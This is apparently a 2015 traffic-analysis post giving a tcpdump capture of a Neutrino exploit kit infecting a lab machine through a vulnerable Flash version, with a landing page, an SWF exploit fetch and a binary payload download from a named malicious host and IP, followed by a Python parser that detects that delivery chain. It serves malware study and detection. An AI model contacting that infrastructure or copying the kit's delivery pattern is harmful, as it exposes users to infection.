Neutrino EK Web based exploit kit – Vulnerable version of flash PCAP Traffic Sample

June 22, 2015

2015-01-26 14:18:38.069043 IP 192.168.221.165.53146 > 192.168.221.2.53: 58797+ A? pelilg.efrai2[.]eu. (34)
E..>……………….5.*.q………….pelilg.efrai2[.]eu…..
2015-01-26 14:18:38.239346 IP 192.168.221.2.53 > 192.168.221.165.53146: 58797 1/0/0 A 108.61.197.150 (50)
E..N ……”………5…:……………pelilg.efrai2[.]eu……………..l=..
2015-01-26 14:18:38.240418 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [S], seq 3183806509, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…(…..l=….o….-…… ……………..
2015-01-26 14:18:38.240919 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [S], seq 1761112290, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…(…..l=….o.h.p……. .u……………
2015-01-26 14:18:38.366092 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [S.], seq 2064132039, ack 3183806510, win 64240, options [mss 1460], length 0
E.., …..a.l=……o…{.’…..`…4V……..
2015-01-26 14:18:38.366263 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [.], ack 1, win 64240, length 0
E..(..@…(…..l=….o…..{.’.P…L………
2015-01-26 14:18:38.366645 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [P.], seq 1:445, ack 1, win 64240, length 444
E…..@…’…..l=….o…..{.’.P…&…GET /feeling.phtml?fumble=14777&spell=25068&jordan=14923&stupid=13334&arrangement=18494&awaken=47391&defeat=43164&flicker=52172&convince=83054&five=77037 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pelilg.efrai2[.]eu:28623
Connection: Keep-Alive
2015-01-26 14:18:38.366794 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [.], ack 445, win 64240, length 0
E..( …..a.l=……o…{.’… .P…JW……..
2015-01-26 14:18:38.380901 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [S.], seq 1969550510, ack 1761112291, win 64240, options [mss 1460], length 0
E.., …..a
l=……o…ud..h.p.`…Y)……..
2015-01-26 14:18:38.381050 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [.], ack 1, win 64240, length 0
E..(..@…(…..l=….o.h.p.ud..P…p………
2015-01-26 14:18:38.533812 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 1:744, ack 445, win 64240, length 743
E… …..^#l=……o…{.’… .P…kH..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

1fc
………..RMo.1…W..”..;$Q?.n.H.@*PAP.q..t.z..=.M…x..D..^f…x……….5…t.n…..`|$..t!…*.31~….`…….9.%Q.F…D7…..WYReg.:.Ph.|>.z.7.z>`…..y&.MX…/9…..|.j..F.]……pK…L…R..jt.;.k..MC.b.c..6.P..W..pX.V.;wo….r..1iM.d.V.X.”9…’..G…..L1…x……X.~…K~…P=’.(………i.lW9…[.`…Q`…pP
C….`…{.@.M..>Ws ..}.Ra..P…;8.U……\….+ 4o5…..[…..Z?.W..U>=….. …….a.Fa..ki..S~q69=……NW……….w…..&s!…W`.F…..fxr..Wi..-g2.oV8………..’..H……..?0g#.e…
0
2015-01-26 14:18:38.637780 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 1:744, ack 445, win 64240, length 743
E… …..^”l=……o…{.’… .P…kH..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

1fc
………..RMo.1…W..”..;$Q?.n.H.@*PAP.q..t.z..=.M…x..D..^f…x……….5…t.n…..`|$..t!…*.31~….`…….9.%Q.F…D7…..WYReg.:.Ph.|>.z.7.z>`…..y&.MX…/9…..|.j..F.]……pK…L…R..jt.;.k..MC.b.c..6.P..W..pX.V.;wo….r..1iM.d.V.X.”9…’..G…..L1…x……X.~…K~…P=’.(………i.lW9…[.`…Q`…pP
C….`…{.@.M..>Ws ..}.Ra..P…;8.U……\….+ 4o5…..[…..Z?.W..U>=….. …….a.Fa..ki..S~q69=……NW……….w…..&s!…W`.F…..fxr..Wi..-g2.oV8………..’..H……..?0g#.e…
0
2015-01-26 14:18:38.637950 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [.], ack 744, win 63497, length 0
E..(..@…(…..l=….o… .{.*.P.. JW……..
2015-01-26 14:18:38.864402 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [P.], seq 1:506, ack 1, win 64240, length 505
E..!..@…&…..l=….o.h.p.ud..P…o<..GET /several.asp?determine=ladder&handkerchief=37049&mistake=toward&slice=about&cart=97268&breathe=lawn HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://pelilg.efrai2[.]eu:28623/feeling.phtml?fumble=14777&spell=25068&jordan=14923&stupid=13334&arrangement=18494&awaken=47391&defeat=43164&f
x-flash-version: 11,4,402,287
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: pelilg.efrai2[.]eu:28623
Connection: Keep-Alive
2015-01-26 14:18:38.864505 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [.], ack 506, win 64240, length 0
E..( …..a.l=……o…ud..h.r.P…n………
2015-01-26 14:18:39.085050 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [P.], seq 1:1356, ack 506, win 64240, length 1355
E..s …..[.l=……o…ud..h.r.P….S..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:38 GMT
Content-Type: application/x-shockwave-flash
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5

f46
2015-01-26 14:18:39.332467 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [P.], seq 42182:42679, ack 506, win 64240, length 497
E… …..^.l=……o…ue.th.r.P……..1….v..dvE.MX….v
y.E*a..:.l1E G…%…2……..1.R…P F…f……..!\./.8W.9…..Ks.C….9.v……
W.(……….{.]E.P.rX….Pfg.`…..M.x)f….>..\_….(..Dt.99N.”.Z.d.#+…jE6…..(..x….l…p.,q…..(3..|….B……..f.N?rz=.:…….t{..V…3…… 1.zEn….H..W..;G6*.5wH.o..GS..W..@m.*……a….M…b.&+.?………_a_—…_a_-_…_a_-_-__…phahckimhxzyoud$ee131993047ba2072adcb7165a63498a1571655012…vmqvhomaff$143e186a389fe713e5bbae7f8fe59a5a1940012711…rcctxojtwy.@….\h?
0
2015-01-26 14:18:39.332591 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [.], ack 42679, win 64240, length 0
E..(.
@…(…..l=….o.h.r.ue.eP….6……..
2015-01-26 14:18:39.930757 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [P.], seq 445:1053, ack 744, win 63497, length 608
E…..@…&?….l=….o… .{.*.P.. ….GET /down/37050/furious/highest/splash/moonlight/connect/thirteen/short/goodness/fortunate/16523/arrive/49435/cliff/door/deal/conversation/coffee/flare/ HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://pelilg.efrai2[.]eu:28623/feeling.phtml?fumble=14777&spell=25068&jordan=14923&stupid=13334&arrangement=18494&awaken=47391&defeat=43164&flicker=52172&convince=83054&five=77037
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pelilg.efrai2[.]eu:28623
Connection: Keep-Alive
2015-01-26 14:18:39.930793 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [.], ack 1053, win 64240, length 0
E..( …..`.l=……o…{.*….JP…E………
2015-01-26 14:18:40.091005 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 744:998, ack 1053, win 64240, length 254
E..& ….._.l=……o…{.*….JP….<..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

14
………………..
0
2015-01-26 14:18:40.179870 IP 192.168.221.165.49183 > 108.61.197.150.28623: Flags [S], seq 1050760563, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…(…..l=….o.>.Us…… ……………..
2015-01-26 14:18:40.193919 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], seq 744:998, ack 1053, win 64240, length 254
E..& ….._.l=……o…{.*….JP….<..HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.5
Content-Encoding: gzip

14
………………..
0
2015-01-26 14:18:40.194048 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [.], ack 998, win 63243, length 0
E..(..@…(…..l=….o….J{.+.P…G………
2015-01-26 14:18:40.297121 IP 108.61.197.150.28623 > 192.168.221.165.49183: Flags [S.], seq 1872247031, ack 1050760564, win 64240, options [mss 1460], length 0
E.., …..`.l=……o…o.8.>.Ut`…`o……..
2015-01-26 14:18:40.297282 IP 192.168.221.165.49183 > 108.61.197.150.28623: Flags [.], ack 1, win 64240, length 0
E..(..@…(…..l=….o.>.Uto.8.P…x,……..
2015-01-26 14:18:40.297533 IP 192.168.221.165.49183 > 108.61.197.150.28623: Flags [P.], seq 1:312, ack 1, win 64240, length 311
E.._..@…’c….l=….o.>.Uto.8.P…….GET /faith.pl?bile=demand&officer=17945&morrow=handkerchief HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pelilg.efrai2[.]eu:28623
2015-01-26 14:18:40.297543 IP 108.61.197.150.28623 > 192.168.221.165.49183: Flags [.], ack 312, win 64240, length 0
E..( …..`.l=……o…o.8.>.V.P…v………
2015-01-26 14:18:40.522608 IP 108.61.197.150.28623 > 192.168.221.165.49183: Flags [P.], seq 1:1356, ack 312, win 64240, length 1355
E..s …..[.l=……o…o.8.>.V.P…….HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Mon, 26 Jan 2015 18:18:40 GMT
Content-Type: application/octet-stream
Content-Length: 376832
Connection: keep-alive
Last-Modified: Mon, 26 Jan 2015 17:34:58 GMT
ETag: "54c67ac2-5c000"
Accept-Ranges: bytes

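As an added example (not part of the original post, and not code from the Neutrino EK sample itself): a small Python parser that reconstructs the HTTP transactions from tcpdump -A style text such as the capture above and flags the sequence a defender would look for in it: a navigation to a text/html landing page, a Flash object fetched by the plugin (request carrying an x-flash-version header, response typed application/x-shockwave-flash), then an application/octet-stream payload download. The SAMPLE text is constructed from the request and response headers shown above, trimmed and with the packet byte dumps shortened; it also keeps one of the retransmitted responses so the parser has to ignore it. The function names and the decision rules are mine; the domain stays defanged as in the post.

```python
"""Reconstruct HTTP transactions from tcpdump -A text and flag the
landing page -> Flash object -> binary payload chain seen in the capture.
Added example; SAMPLE is constructed from the headers in the post."""
import re

# Packet header line as printed by tcpdump; ASCII dump and HTTP text follow it.
PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \["
)
REQ_RE = re.compile(r"(GET|POST|HEAD) (\S+) HTTP/1\.[01]")  # may follow raw bytes
RESP_RE = re.compile(r"HTTP/1\.[01] (\d{3})")
HDR_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")

# Constructed from the capture above: landing page, its retransmitted response,
# the SWF request made by the Flash plugin, and the payload download.
SAMPLE = """\
2015-01-26 14:18:38.366645 IP 192.168.221.165.49178 > 108.61.197.150.28623: Flags [P.], length 444
E.....@...'.....l=....o.....{.'.P...&...GET /feeling.phtml?fumble=14777&spell=25068 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer:
Host: pelilg.efrai2[.]eu:28623
2015-01-26 14:18:38.533812 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], length 743
E... .....^#l=......o...{.'... .P...kH..HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked

1fc
2015-01-26 14:18:38.637780 IP 108.61.197.150.28623 > 192.168.221.165.49178: Flags [P.], length 743
E... .....^"l=......o...{.'... .P...kH..HTTP/1.1 200 OK
Content-Type: text/html
2015-01-26 14:18:38.864402 IP 192.168.221.165.49179 > 108.61.197.150.28623: Flags [P.], length 505
E..!..@...&.....l=....o.h.p.ud..P...o<..GET /several.asp?determine=ladder HTTP/1.1
Accept: */*
x-flash-version: 11,4,402,287
Host: pelilg.efrai2[.]eu:28623
2015-01-26 14:18:39.085050 IP 108.61.197.150.28623 > 192.168.221.165.49179: Flags [P.], length 1355
E..s .....[.l=......o...ud..h.r.P....S..HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
2015-01-26 14:18:40.297533 IP 192.168.221.165.49183 > 108.61.197.150.28623: Flags [P.], length 311
E.._..@...'c....l=....o.>.Uto.8.P.......GET /faith.pl?bile=demand HTTP/1.1
Accept: */*
Host: pelilg.efrai2[.]eu:28623
2015-01-26 14:18:40.522608 IP 108.61.197.150.28623 > 192.168.221.165.49183: Flags [P.], length 1355
E..s .....[.l=......o...o.8.>.V.P.......HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 376832
"""


def parse_http_transactions(text):
    """Pair each request with the first response seen on the same 4-tuple flow.
    A retransmitted response (flow already has its response) is ignored."""
    transactions, open_by_flow = [], {}
    current = None   # (flow, timestamp) of the packet currently being read
    headers = None   # dict currently receiving "Name: value" lines, if any
    for raw in text.splitlines():
        line = raw.strip()
        m = PKT_RE.match(line)
        if m:
            flow = frozenset({(m["src"], m["sport"]), (m["dst"], m["dport"])})
            current, headers = (flow, m["ts"]), None
            continue
        if current is None:
            continue
        flow, ts = current
        r = REQ_RE.search(line)
        if r:
            txn = {"ts": ts, "flow": tuple(sorted(flow)), "method": r.group(1),
                   "path": r.group(2), "req_headers": {}, "status": None,
                   "resp_headers": {}}
            transactions.append(txn)
            open_by_flow[flow] = txn      # keep-alive: newest request owns the flow
            headers = txn["req_headers"]
            continue
        s = RESP_RE.search(line)
        if s:
            txn = open_by_flow.get(flow)
            if txn is None or txn["status"] is not None:
                headers = None            # orphan response or TCP retransmission
                continue
            txn["status"] = int(s.group(1))
            headers = txn["resp_headers"]
            continue
        h = HDR_RE.match(line)
        if h and headers is not None:
            headers[h.group(1).lower()] = h.group(2).strip()
        else:
            headers = None                # blank line or body: header block ended
    return transactions


def flash_version_tuple(header_value):
    """'11,4,402,287' (x-flash-version format) -> (11, 4, 402, 287), so the
    observed client version can be compared with whatever baseline you choose."""
    return tuple(int(p) for p in header_value.split(","))


def find_exploit_chain(transactions):
    """Landing page (navigation to text/html), Flash object fetched by the plugin
    (x-flash-version request header, SWF content type), octet-stream payload."""
    f = {"landing": None, "flash": None, "flash_version": None,
         "payload": None, "payload_bytes": None}
    for t in transactions:
        ctype = t["resp_headers"].get("content-type", "")
        accept = t["req_headers"].get("accept", "")
        if "x-flash-version" in t["req_headers"] and ctype.startswith("application/x-shockwave-flash"):
            f["flash"], f["flash_version"] = t["path"], t["req_headers"]["x-flash-version"]
        elif ctype.startswith("application/octet-stream"):
            f["payload"] = t["path"]
            f["payload_bytes"] = int(t["resp_headers"].get("content-length", 0))
        elif f["landing"] is None and ctype.startswith("text/html") and accept.startswith("text/html"):
            f["landing"] = t["path"]
    f["chain_complete"] = all(f[k] is not None for k in ("landing", "flash", "payload"))
    return f
```

Run `find_exploit_chain(parse_http_transactions(SAMPLE))` on the constructed text and it reports the three stages with the client's Flash version (11,4,402,287) and the 376832-byte payload; on a real capture, feed it the output of `tcpdump -A -r file.pcap`. Pairing by 4-tuple rather than by direction is what lets the second request on the keep-alive connection (port 49178 above) and the retransmitted responses be handled without tracking sequence numbers.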